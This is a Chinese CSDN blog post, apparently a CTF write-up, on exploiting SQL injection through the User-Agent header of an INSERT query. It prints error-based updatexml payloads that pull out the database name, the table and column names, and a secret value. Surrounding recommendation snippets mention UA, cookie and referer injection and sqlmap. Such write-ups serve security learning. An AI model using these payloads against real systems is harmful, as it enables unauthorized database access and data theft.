记录一次ua头注入

最新推荐文章于 2024-04-08 20:37:06 发布
最新推荐文章于 2024-04-08 20:37:06 发布
阅读量1k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40800734/article/details/107164358
版权

打开一看

随便提交点啥

题目名称是sql,结合题意考虑是ua头注入

抓包,添加一个单引号果然报错了

尝试注入

看回显猜测原语句应该是这种$query = sprintf("INSERT INTO visits (ua, user,passwd) VALUES ('%s', '%s','%s')",

尝试闭合' ,updatexml(1,concat('##',(database())),0))#

这里由于没有插入user参数,没有成功返回

继续',  'xZ',updatexml(1,concat('##',(database())),0))#或者' or updatexml(1,concat('##',(database())),0),  'xZ','xz')#

然后就是常规操作

',  'xZ',updatexml(1,concat('##',(select group_concat(table_name) from information_schema.tables where table_schema='test')),0))#
',  'xZ',updatexml(1,concat('##',(select group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='secert')),0))#
',  'xZ',updatexml(1,concat('##',(select secert from secert) ),0))#

qq_40800734
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
App端user-agent请求大全,几千个ua
10-15
常见的app端ua请求,适合爬虫和测试人员
python爬虫十万条UA User_Agent信息浏览器信息包括手机
03-30
包括电脑端手机端user_agent,手机都是一年内最新的设备信息,因为是用户访问网站的记录,所以里面有重复的 wap:Mozilla/5.0 (Linux; U; Android 5.1.1; zh-CN; FDR-A01w Build/HuaweiMediaPad) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 wap:Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/15G77 UCBrowser/12.1.7.1109 Mobile AliApp(TUnionSDK/0.1.20.3) wap:Mozilla/5.0 (Linux; U; Android 7.0; zh-cn; HUAWEI CAZ-TL10 Build/HUAWEICAZ-TL10) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/8.9 Mobile Safari/537.36 wap:Mozilla/5.0 (Linux; U; Android 5.1.1; zh-CN; FDR-A01w Build/HuaweiMediaPad) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 wap:Mozilla/5.0 (Linux; U; Android 5.1.1; zh-CN; FDR-A01w Build/HuaweiMediaPad) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 pc:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.5.2.18321
UA注入Cookie注入Referer注入
十五年游戏主程转渗透之路
04-09 5003
UA注入,Cookie注入,Referer注入
sql学习5(cookie注入UA注入,refer注入,过滤空格)
最新发布
cyy001128的博客
04-08 1051
获取cookie可免密登录管理员账户Cookie通常被用来辨别用户身份,就是保存用户的账号和密码用来自动登录网站cookie注入的基本条件:使用了request方法,但是注入保护程序中只对get\post方法提交的数据进行了过滤。
UA小记
猪肉炖白菜
05-08 155
Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrailFirefox/firefoxversion Mozilla/5.0是一个通用标记符号,用来表示与 Mozilla 兼容,这几乎是现代浏览器的标配。 platform用来说明浏览器所运行的原生系统平台(例如 Windows、Mac、Linux 或 Android),以及是否运行在手机上。搭载 Firefox OS 的手机仅简单地使用了 "Mobile" 这个字符串;因为 web 本身就是...
python爬虫第二课:请求之伪装UA
On the road to profession
04-08 1271
UA:'User-Agent',一些网站最基本的反爬虫手段就是通过UA判断来源,如果UA不正常,则可能是机器人了。 现在进行伪装,建立一个字典,如果懒得去浏览器上复制,则可以使用fake_useragent库的UserAgent模块: # headers.py from fake_useragent import UserAgent; class headers: def __in...
【web安全】——HTTP请求注入
Demo不是emo的博客
01-10 4555
http请求注入操作
渗透测试---手把手教你SQL注入(3)---UA注入与referer注入
weixin_52796034的博客
10-10 367
有些网站会把用户的UA信息写入数据库,用来收集和统计用户信息,此时就有可能存在UA 注入,一般会把数据插入到某张表中所以可以用报错注入。 当我们访问一个网站的时候,我们的浏览器需要告诉服务器我们是从哪个地方访问服务器的,大部分网站或者app都会将这样的信息写入数据库用来分析流量从哪里来,以及统计广告投入的成本,通常情况下,服务器会把数据插入到某张表中,那么我们就可以借此使用报错注入
User-Agent(UA)的二三事
nicole_jj的专栏
05-09 942
User-Agent是浏览器请求中带有的一个信息,包含了http请求发起者的信息。http协议在请求中包含这个域的主要目的是为了统计数据,同时可以达到追踪是否有违背协议的情况出现以及根据特定的用户适配特定的页面的需求。浏览器领域的纷争给了UA更多的发展,目前http://www.user-agents.org/列出的ua已经多达上百条。我们目前最常用的就是各种终端设备(尤其是手机)浏览器提交
sqlmap基本使用方法
qq_54030686的博客
06-28 3349
本文只介绍sqlmap的简单使用方法,参考官方文档csdn师傅个人建议,具体参数直接看csdn师傅的即可,本文以DC9靶场作为目标进行练习,使用sqlmap获取目标数据或权限GET型 输入自己的目标地址 自动输入选项的属性值 设置测试的等级(1-5,默认为1)lv2:cookie注入; lv3:user-agent注入,lv4:refere注入; lv5:host注入 POST型 可以获取对应地址的请求包,使用bp抓包保存即可 或者 选择传参的方式 选择传入的参数 采用随机UA 查看当
目前5大浏览器厂商的UAPC版,大家做爬虫时可以用
淡淡风
03-26 5761
谷歌览器:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 360览器:Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 EDGE浏览器:Mozilla/5
Day1使用Burpsuite抓包工具抓包,改变UA使得手机和pc端界面互相转换
qq_45169358的博客
11-30 1691
Day1使用Burpsuite抓包工具抓包,改变UA使得手机和pc端界面互相转换
西门子Sinumerik数控系统OPC UA配置记录
03-09
介绍西门子Sinumerik数控系统的基础知识和OPC UA的配置方式
opcua.订阅流程记录.docx
04-16
结合open62541 源码介绍opcua 的订阅流程的处理,以及登录的流程代码
OPCUA客户端uaexpert
08-22
uaexpert是用于测试OPCUA服务器的客户端,不需要积分免费下载。可以访问OPCUA服务器的变量、方法。
安卓UA一万个
12-06
安卓UA一万个,安卓4.0,安卓4.1、4.2、4.3/6.0/6.1,联想vivooppo 华为 应有尽有
一个基于Python写的OPC UA客户端例子
12-11
环境:WIndows 10 + Pycharm + python3.8.x + pyQT5 只连接了OPC UA服务器,获取变量数据,写标签数据。比较简单
03-requests模块携带UA请求,携带参数,携带cookie,持久化存储
gemoumou的python学习实记
08-20 2118
requess 爬虫中一个基于网络请求的模块 安装 pip install requests 作用:模拟浏览器发起请求 爬虫流程 1,指定url 2,发起请求 3,获取相应数据(爬取到的页面源码数据) 4,持久化存储 案例一 # -*- coding: utf-8 -*- import requests # 调用requests模块 from lxml import etree url = "http://www.shicimingju.com/book/sanguoyanyi.html" #
爬虫小菜:使用fake-useragent随机伪装UA
u011423145的博客
10-11 1164
在爬虫中我们经常需要伪装请求中的User-Agent部,用于访问目标网站。但是只用一个User-Agent短时间内连续访问目标网站可能会有被Banned风险。 一般网上有解决方案说讲一批User-Agent写入到配置文件中,爬虫在请求中随机拿一个User-Agent再去请求即可。 ...
UA注入 sqlmap
07-31
UA注入是一种常见的Web应用程序漏洞,它利用了用户代理(User-Agent)字段中的恶意输入来执行SQL注入攻击。通过在User-Agent字段中注入恶意的SQL语句,攻击者可以绕过应用程序的输入验证,直接与数据库进行交互,并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值